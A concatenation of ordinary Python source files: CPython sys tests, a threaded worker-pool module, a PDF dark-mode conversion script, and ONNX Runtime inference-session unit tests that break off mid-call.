test_slots(self): # check all subclassable types defined in Objects/ that allow # non-empty __slots__ check = self.check_slots class BA(bytearray): __slots__ = 'a', 'b', 'c' check(BA(), bytearray(), '3P') class D(dict): __slots__ = 'a', 'b', 'c' check(D(x=[]), {'x': []}, '3P') class L(list): __slots__ = 'a', 'b', 'c' check(L(), [], '3P') class S(set): __slots__ = 'a', 'b', 'c' check(S(), set(), '3P') class FS(frozenset): __slots__ = 'a', 'b', 'c' check(FS(), frozenset(), '3P') from collections import OrderedDict class OD(OrderedDict): __slots__ = 'a', 'b', 'c' check(OD(x=[]), OrderedDict(x=[]), '3P') def test_pythontypes(self): # check all types defined in Python/ size = test.support.calcobjsize vsize = test.support.calcvobjsize check = self.check_sizeof # _ast.AST import _ast check(_ast.AST(), size('P')) try: raise TypeError except TypeError: tb = sys.exc_info()[2] # traceback if tb is not None: check(tb, size('2P2i')) # symtable entry # XXX # sys.flags check(sys.flags, vsize('') + self.P * len(sys.flags)) def test_asyncgen_hooks(self): old = sys.get_asyncgen_hooks() self.assertIsNone(old.firstiter) self.assertIsNone(old.finalizer) firstiter = lambda *a: None sys.set_asyncgen_hooks(firstiter=firstiter) hooks = sys.get_asyncgen_hooks() self.assertIs(hooks.firstiter, firstiter) self.assertIs(hooks[0], firstiter) self.assertIs(hooks.finalizer, None) self.assertIs(hooks[1], None) finalizer = lambda *a: None sys.set_asyncgen_hooks(finalizer=finalizer) hooks = sys.get_asyncgen_hooks() self.assertIs(hooks.firstiter, firstiter) self.assertIs(hooks[0], firstiter) self.assertIs(hooks.finalizer, finalizer) self.assertIs(hooks[1], finalizer) sys.set_asyncgen_hooks(*old) cur = sys.get_asyncgen_hooks() self.assertIsNone(cur.firstiter) self.assertIsNone(cur.finalizer) def test_changing_sys_stderr_and_removing_reference(self): # If the default displayhook doesn't take a strong reference # to sys.stderr the following code can crash. See bpo-43660 # for more details. code = textwrap.dedent(''' import sys class MyStderr: def write(self, s): sys.stderr = None sys.stderr = MyStderr() 1/0 ''') rc, out, err = assert_python_failure('-c', code) self.assertEqual(out, b"") self.assertEqual(err, b"") if __name__ == "__main__": unittest.main()
workerpool.py
"""Worker pool module.""" import logging from threading import Thread, Event import queue _LOGGER = logging.getLogger(__name__) class WorkerPool(object): """Worker pool class to implement single producer/multiple consumer.""" def __init__(self, worker_count, worker_func): """ Class constructor. :param worker_count: Number of workers for the pool. :type worker_func: Function to be executed by the workers whenever a messages is fetched. """ self._failed = False self._incoming = queue.Queue() self._should_be_working = [True for _ in range(0, worker_count)] self._worker_events = [Event() for _ in range(0, worker_count)] self._threads = [ Thread(target=self._wrapper, args=(i, worker_func), name="pool_worker_%d" % i) for i in range(0, worker_count) ] for thread in self._threads: thread.setDaemon(True) def start(self): """Start the workers.""" for thread in self._threads: thread.start() @staticmethod def _safe_run(func, message): """ Execute the user funcion for a given message without raising exceptions. :param func: User defined function. :type func: callable :param message: Message fetched from the queue. :param message: object :return True if no everything goes well. False otherwise. :rtype bool """ try: func(message) return True except Exception: # pylint: disable=broad-except _LOGGER.error("Something went wrong when processing message %s", message) _LOGGER.debug('Original traceback: ', exc_info=True) return False def _wrapper(self, worker_number, func): """ Fetch message, execute tasks, and acknowledge results. :param worker_number: # (id) of worker whose function will be executed. :type worker_number: int :param func: User defined function. :type func: callable. """ while self._should_be_working[worker_number]: try: message = self._incoming.get(True, 0.5) # For some reason message can be None in python2 implementation of queue. # This method must be both ignored and acknowledged with .task_done() # otherwise .join() will halt. if message is None: _LOGGER.debug('spurious message received. acking and ignoring.') self._incoming.task_done() continue # If the task is successfully executed, the ack is done AFTERWARDS, # to avoid race conditions on SDK initialization. _LOGGER.debug("processing message '%s'", message) ok = self._safe_run(func, message) # pylint: disable=invalid-name if not ok: self._failed = True _LOGGER.error( ("Something went wrong during the execution, " "removing message \"%s\" from queue."), message ) self._incoming.task_done() except queue.Empty: # No message was fetched, just keep waiting. pass # Set my flag indicating that i have finished self._worker_events[worker_number].set() def submit_work(self, message): """ Add a new message to the work-queue. :param message: New message to add. :type message: object. """ self._incoming.put(message) _LOGGER.debug('queued message %s for processing.', message) def wait_for_completion(self): """Block until the work queue is empty.""" _LOGGER.debug('waiting for all messages to be processed.') self._incoming.join() _LOGGER.debug('all messages processed.') old = self._failed self._failed = False return old def stop(self, event=None): """Stop all worker nodes.""" async_stop = Thread(target=self._wait_workers_shutdown, args=(event,)) async_stop.setDaemon(True) async_stop.start() def _wait_workers_shutdown(self, event): """ Wait until all workers have finished, and set the event. :param event: Event to set as soon as all the workers have shut down. :type event: threading.Event """ self.wait_for_completion() for index, _ in enumerate(self._should_be_working): self._should_be_working[index] = False if event is not None: for worker_event in self._worker_events: worker_event.wait() event.set()
darkmode.py
# JustinTheWhale """ Program that converts all of the .pdf files in the same directory to have a "Dark mode" to put less strain on your eyes :-) Final file will be saved with the same name but with "_darkmode.pdf" at the end Things to note: Might take a while depending on how large your .pdf(s) is/are The final file is much larger than the original file """ import multiprocessing as mp import os import sys from threading import Thread import cv2 import numpy as np from fpdf import FPDF from numba import jit, uint8 from pdf2image import convert_from_path from PIL import Image from PyPDF2 import PdfFileMerger class Darkmode: """ Attributes ---------- threads : int An integer representing the available cpu threads. More than 16 caused strange issues on Windows. pdfs : list[str] A list of string(s) of pdf files to process. pngs : list[str] A list of string(s) of png files to process. temp_pdfs : list[str] A list of string(s) of temp_pdf files to process. pdf_groups : dict{str : [str]} A dict conatining the base filename for a pdf and a list of its converted pages. batches : list[list] A list of lists to distribute the processing evenly on the CPU. Methods ------- pdf_to_png(dpi_count=300): Iterates through each pdf file in self.pdfs and separates indiviual pages into separate png files. The names of the png files are saved in self.pngs. make_batches(task_list): Makes a list of lists where len(list) does not exceed cpu count. If a large PDF is encountered, each page will be converted by its own process. Starting more processes than cpu count might lead to performance regression. make_processes(): Adds process objects to self.process_list. start_processes(): Starts indiviual process objects in self.process_list. make_threads(): Adds thread objects to self.thread_list. start_threads(): Starts indiviual thread objects in self.thread_list. def speed(image): Uses numba to quickly parse image array and change pixels to grey. black_to_grey(file): Takes inverted .png image and converts all black pixels to grey. png_to_pdf(png): Converts darkmode .png files to .pdf files. Adds temp filename to self.temp_pdfs after. get_groups(): Goes through temp pdf files to group PDF pages by filename. Changes value of self.pdfs. repack(self): Packs all converted pdf files into a single PDF. Uses self.temp_pdfs for processing. """ def __init__(self, pdfs=None): self.threads = mp.cpu_count() if self.threads > 16: self.threads = 16 self.pdfs = [] self.pngs = [] self.temp_pdfs = [] self.pdf_groups = {} self.process_list = [] self.thread_list = [] self.batches = [] def pdf_to_png(self, dpi_count=300): """ Iterates through each pdf file in self.pdfs and separates indiviual pages into separate png files. The names of the png files are saved in self.pngs. Arguments: dpi_count (Optional)) : int that specifies dpi when processing. Higher dpi scales with longer processing and higher quality. """ for file in self.pdfs: pages = convert_from_path( file, dpi=dpi_count, thread_count=self.threads, grayscale=True ) new_name = file[:-4] for page in pages: name = f"{new_name}-page{str(pages.index(page)).zfill(4)}.png" self.pngs.append(name) page.save(name, "PNG", compress_level=1) inverted = np.where(cv2.imread(name) <= 140, 255, 0) cv2.imwrite(name, inverted) def make_batches(self, task_list): """ Makes a list of lists where len(list) does not exceed cpu count. If a large PDF is encountered, each page will be converted by its own process. Starting more processes than cpu count might lead to performance regression. Arguments: task_list (list): List of threads/processes. cpus (int): How long each sublist will be. Returns: batches (list) : List of lists where each sub-list is <= cpus. """ if len(task_list) <= self.threads: return [task_list] else: batches = [ task_list[i : i + self.threads] for i in range(len(task_list), self.threads) ] return batches def make_processes(self): """ Adds process objects to self.process_list. """ for file in self.pngs: p = mp.Process(target=self.black_to_grey, args=(file,)) self.process_list.append(p) def start_processes(self): """ Starts indiviual process objects in self.process_list. """ self.process_list = self.make_batches(self.process_list) for i in range(len(self.process_list)): for p in self.process_list[i]: p.start() for p in self.process_list[i]: p.join() def make_threads(self): """ Adds thread objects to self.thread_list. """ for file in self.pngs: t = Thread(target=self.png_to_pdf, args=(file,)) self.thread_list.append(t) def start_threads(self): """ Starts indiviual thread objects in self.thread_list. """ self.thread_list = self.make_batches(self.thread_list) for i in range(len(self.thread_list)): for t in self.thread_list[i]: t.start() for t in self.thread_list[i]: t.join() @staticmethod @jit(nopython=True, cache=True, fastmath={"fast"}) def speed(image): """ Uses numba to quickly parse image array and change pixels to grey. Arguments: image (numpy.array) : Image in contained within a numpy array. Returns: image (numpy.array) : Converted numpy.image array """ grey = np.full((3), fill_value=70, dtype=np.uint8) for i in range(len(image)): for j in range(len(image[0])): if np.sum(image[i, j]) == 0: image[i, j] = grey return image def black_to_grey(self, file): """ Takes inverted .png image and converts all black pixels to grey. Arguments: file (str) : String representing string filename. """ color_array = cv2.imread(file) color_array = self.speed(color_array) cv2.imwrite(file, color_array) def png_to_pdf(self, png): """ Converts darkmode .png files to .pdf files. Adds temp filename to self.temp_pdfs after. Arguments: png (str): String representing string filename. """ pdf = FPDF() pdf.add_page() pdf.image(png, 0, 0, 210, 300) name = png.replace(".png", "_temp_darkmode.pdf") pdf.output(name, "F") pdf.close() self.temp_pdfs.append(name) os.remove(png) def get_groups(self): """ Goes through temp pdf files to group PDF pages by filename. Changes value of self.pdfs. """ pdfs = {} for file in sorted(self.temp_pdfs): if file.endswith(".pdf") and "darkmode" in file: pdf_file = file.split("-")[0] if pdf_file in pdfs: pdfs[pdf_file].append(file) else: pdfs[pdf_file] = [file] self.temp_pdfs = pdfs def repack(self): """ Packs all converted pdf files into a single PDF. Uses self.temp_pdfs for processing. """ pdfs = list(self.temp_pdfs.keys()) for pdf in pdfs: merger = PdfFileMerger() for file in self.temp_pdfs[pdf]: merger.append(file) name = f"{pdf}_converted.pdf" merger.write(name) merger.close() def main(files=None): """ Main function, creates object and calls class methods. Arguments: files (Optional) : str or list of files to convert. """ darkmode_generator = Darkmode() if files is not None: if isinstance(files, list) and files != []: for file in files: if not os.path.exists(file): print(f"Can't find {file} with the given path, exiting!") return else: darkmode_generator.pdfs.append(file) elif isinstance(files, str): if os.path.exists(files): darkmode_generator.pdfs = [files] else: print(f"Can't find {files} with the given path, exiting!") return else: print("Invalid file type detected, exiting!") return else: # This does all darkmode_generator.pdfs = [] for file in os.listdir("."): if file.endswith(".pdf") and "_converted" not in file: darkmode_generator.pdfs.append(file) darkmode_generator.pdf_to_png() darkmode_generator.make_processes() darkmode_generator.start_processes() darkmode_generator.make_threads() darkmode_generator.start_threads() darkmode_generator.pdf_groups = darkmode_generator.get_groups() darkmode_generator.repack() for item in darkmode_generator.temp_pdfs.values(): for i in item: os.remove(i) def convert(files=None): """ Calls the main function, This is what should be called when using package. Arguments: files (Optional) : str or list of files to convert. """ main(files=files) if __name__ == "__main__": n = len(sys.argv) if n == 1: convert() elif n == 2: if "pdf" in sys.argv[1]: convert(files=sys.argv[1]) else: files = sys.argv files.pop(0) for i in range(len(files)): if "pdf" in files[i]: pass else: files.pop(i) if files != []: convert(files=files)
onnxruntime_test_python.py
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. # -*- coding: UTF-8 -*- import unittest import os import numpy as np import onnxruntime as onnxrt import threading class TestInferenceSession(unittest.TestCase): def get_name(self, name): if os.path.exists(name): return name rel = os.path.join("testdata", name) if os.path.exists(rel): return rel this = os.path.dirname(__file__) data = os.path.join(this, "..", "testdata") res = os.path.join(data, name) if os.path.exists(res): return res raise FileNotFoundError("Unable to find '{0}' or '{1}' or '{2}'".format(name, rel, res)) def run_model(self, session_object, run_options): x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = session_object.get_inputs()[0].name res = session_object.run([], {input_name: x}, run_options=run_options) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testModelSerialization(self): so = onnxrt.SessionOptions() so.log_verbosity_level = 1 so.logid = "TestModelSerialization" so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx" onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so) self.assertTrue(os.path.isfile(so.optimized_model_filepath)) def testGetProviders(self): self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers()) self.assertTrue('CPUExecutionProvider' in onnxrt.get_all_providers()) sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) self.assertTrue('CPUExecutionProvider' in sess.get_providers()) def testSetProviders(self): if 'CUDAExecutionProvider' in onnxrt.get_available_providers(): sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) # confirm that CUDA Provider is in list of registered providers. self.assertTrue('CUDAExecutionProvider' in sess.get_providers()) # reset the session and register only CPU Provider. sess.set_providers(['CPUExecutionProvider']) # confirm only CPU Provider is registered now. self.assertEqual(['CPUExecutionProvider'], sess.get_providers()) def testInvalidSetProviders(self): with self.assertRaises(ValueError) as context: sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) sess.set_providers(['InvalidProvider']) self.assertTrue( '[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception)) def testSessionProviders(self): if 'CUDAExecutionProvider' in onnxrt.get_available_providers(): # create session from scratch, but constrain it to only use the CPU. sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"), providers=['CPUExecutionProvider']) self.assertEqual(['CPUExecutionProvider'], sess.get_providers()) def testRunModel(self): sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 2]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testRunModelFromBytes(self): with open(self.get_name("mul_1.onnx"), "rb") as f: content = f.read() sess = onnxrt.InferenceSession(content) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 2]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testRunModel2(self): sess = onnxrt.InferenceSession(self.get_name("matmul_1.onnx")) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 1]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testRunModel2Contiguous(self): sess = onnxrt.InferenceSession(self.get_name("matmul_1.onnx")) x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]] input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 1]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) xcontiguous = np.ascontiguousarray(x) rescontiguous = sess.run([output_name], {input_name: xcontiguous}) np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08) def testRunModelMultipleThreads(self): so = onnxrt.SessionOptions() so.log_verbosity_level = 1 so.logid = "MultiThreadsTest" sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so) ro1 = onnxrt.RunOptions() ro1.logid = "thread1" t1 = threading.Thread(target=self.run_model, args=(sess, ro1)) ro2 = onnxrt.RunOptions() ro2.logid = "thread2" t2 = threading.Thread(target=self.run_model, args=(sess, ro2)) t1.start() t2.start() t1.join() t2.join() def testListAsInput(self): sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name res = sess.run([], {input_name: x.tolist()}) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testStringListAsInput(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2)) x_name = sess.get_inputs()[0].name res = sess.run([], {x_name: x.tolist()}) np.testing.assert_equal(x, res[0]) def testRunDevice(self): device = onnxrt.get_device() self.assertTrue('CPU' in device or 'GPU' in device) def testRunModelSymbolicInput(self): sess = onnxrt.InferenceSession(self.get_name("matmul_2.onnx")) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape # Input X has an unknown dimension. self.assertEqual(input_shape, ['None', 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape # Output X has an unknown dimension. self.assertEqual(output_shape, ['None', 1]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testBooleanInputs(self): sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx")) a = np.array([[True, True], [False, False]], dtype=np.bool) b = np.array([[True, False], [True, False]], dtype=np.bool) # input1:0 is first in the protobuf, and input:0 is second # and we maintain the original order. a_name = sess.get_inputs()[0].name self.assertEqual(a_name, "input1:0") a_shape = sess.get_inputs()[0].shape self.assertEqual(a_shape, [2, 2]) a_type = sess.get_inputs()[0].type self.assertEqual(a_type, 'tensor(bool)') b_name = sess.get_inputs()[1].name self.assertEqual(b_name, "input:0") b_shape = sess.get_inputs()[1].shape self.assertEqual(b_shape, [2, 2]) b_type = sess.get_inputs()[0].type self.assertEqual(b_type, 'tensor(bool)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(bool)') output_expected = np.array([[True, False], [False, False]], dtype=np.bool) res = sess.run([output_name], {a_name: a, b_name: b}) np.testing.assert_equal(output_expected, res[0]) def testStringInput1(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "input:0") x_shape = sess.get_inputs()[0].shape self.assertEqual(x_shape, [2, 2]) x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(string)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) np.testing.assert_equal(x, res[0]) def testStringInput2(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "input:0") x_shape = sess.get_inputs()[0].shape self.assertEqual(x_shape, [2, 2]) x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(string)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) np.testing.assert_equal(x, res[0]) def testInputBytes(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "input:0") x_shape = sess.get_inputs()[0].shape self.assertEqual(x_shape, [2, 2]) x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(string)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) np.testing.assert_equal(x, res[0].astype('|S8')) def testInputObject(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "input:0") x_shape = sess.get_inputs()[0].shape self.assertEqual(x_shape, [2, 2]) x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(string)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) np.testing.assert_equal(x, res[0]) def testInputVoid(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "input:0") x_shape = sess.get_inputs()[0].shape self.assertEqual(x_shape, [2, 2]) x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(string)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']], dtype=object) np.testing.assert_equal(expr, res[0]) def testZipMapStringFloat(self): sess = onnxrt.InferenceSession(self.get_name("zipmap_stringfloat.onnx")) x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "X") x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(float)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Z") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(map(string,tensor(float)))') output_expected = [{ 'class2': 0.0, 'class1': 1.0, 'class3': 3.0 }, { 'class2': 23.0, 'class1': 44.0, 'class3': 11.0 }] res = sess.run([output_name], {x_name: x}) self.assertEqual(output_expected, res[0]) def testZipMapInt64Float(self): sess = onnxrt.InferenceSession(self.get_name("zipmap_int64float.onnx")) x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "X") x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(float)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Z") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(map(int64,tensor(float)))') output_expected = [{10: 1.0, 20: 0.0, 30: 3.0}, {10: 44.0, 20: 23.0, 30: 11.0}] res = sess.run([output_name], {x_name: x}) self.assertEqual(output_expected, res[0]) def testRaiseWrongNumInputs(self): with self.assertRaises(ValueError) as context: sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx")) a = np.array([[True, True], [False, False]], dtype=np.bool) res = sess.run([], {'input:0': a}) self.assertTrue('Model requires 2 inputs' in str(context.exception)) def testModelMeta(self): model_path = "../models/opset8/test_squeezenet/model.onnx" if not os.path.exists(model_path): return sess = onnxrt.InferenceSession(model_path) modelmeta = sess.get_modelmeta() self.assertEqual('onnx-caffe2', modelmeta.producer_name) self.assertEqual('squeezenet_old', modelmeta.graph_name) self.assertEqual('', modelmeta.domain) self.assertEqual('', modelmeta.description) def testProfilerWithSessionOptions(self): so = onnxrt.SessionOptions() so.enable_profiling = True sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) sess.run([], {'X': x}) profile_file = sess.end_profiling() tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args'] with open(profile_file) as f: lines = f.readlines() self.assertTrue('[' in lines[0]) for i in range(1, 8): for tag in tags: self.assertTrue(tag in lines[i]) self.assertTrue(']' in lines[8]) def testDictVectorizer(self): sess = onnxrt.InferenceSession(self.get_name("pipeline_vectorize.onnx")) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "float_input") input_type = str(sess.get_inputs()[0].type) self.assertEqual(input_type, "map(int64,tensor(float))") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, []) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "variable1") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, "tensor(float)") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [1, 1]) # Python type x = {0: 25.0, 1: 5.13, 2: 0.0, 3: 0.453, 4: 5.966} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) xwrong = x.copy() xwrong["a"] = 5.6 try: res = sess.run([output_name], {input_name: xwrong}) except RuntimeError as e: self.assertIn("Unexpected key type <class 'str'>, it cannot be linked to C type int64_t", str(e)) # numpy type x = {np.int64(k): np.float32(v) for k, v in x.items()} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) x = {np.int64(k): np.float64(v) for k, v in x.items()} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) x = {np.int32(k): np.float64(v) for k, v in x.items()} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testLabelEncoder(self): sess = onnxrt.InferenceSession(self.get_name("LabelEncoder.onnx")) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "input") input_type = str(sess.get_inputs()[0].type) self.assertEqual(input_type, "tensor(string)") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [1, 1]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "variable") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, "tensor(int64)") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [1, 1]) # Array x = np.array([['4']]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[3]], dtype=np.int64) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) # Python type x = np.array(['4'], ndmin=2) res = sess.run([output_name], {input_name: x}) output_expected = np.array([3], ndmin=2, dtype=np.int64) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) x = np.array(['4'], ndmin=2, dtype=np.object) res = sess.run([output_name], {input_name: x}) output_expected = np.array([3], ndmin=2, dtype=np.int64) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def test_run_model_mlnet(self): sess = onnxrt.InferenceSession(self.get_name("mlnet_encoder.onnx")) names = [_.name for _ in sess.get_outputs()] self.assertEqual(['C00', 'C12'], names) c0 = np.array([5.], dtype=np.float32).reshape(1, 1) c1 = np.array([b'A\0A\0', b"B\0B\0", b"C\0C\0"], np.void).reshape(1, 3) res = sess.run(None, {'C0': c0, 'C1': c1}) mat = res[1] total = mat.sum() self.assertEqual(total, 2) self.assertEqual(list(mat.ravel()), list(np.array([[[0., 0., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.]]]).ravel())) # In memory, the size of each element is fixed and equal to the # longest element. We cannot use bytes because numpy is trimming # every final 0 for strings and bytes before creating the array # (to save space). It does not have this behaviour for void # but as a result, numpy does not know anymore the size # of each element, they all have the same size. c1 = np.array([b'A\0A\0\0', b"B\0B\0", b"C\0C\0"], np.void).reshape(1, 3) res = sess.run(None, {'C0': c0, 'C1': c1}) mat = res[1] total = mat.sum() self.assertEqual(total, 0) def testGraphOptimizationLevel(self): opt = onnxrt.SessionOptions() # default should be all optimizations optimization self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED) sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"), sess_options=opt) a = np.array([[True, True], [False, False]], dtype=np.bool) b = np.array([[True, False], [True, False]], dtype=np.bool) res = sess.run([], 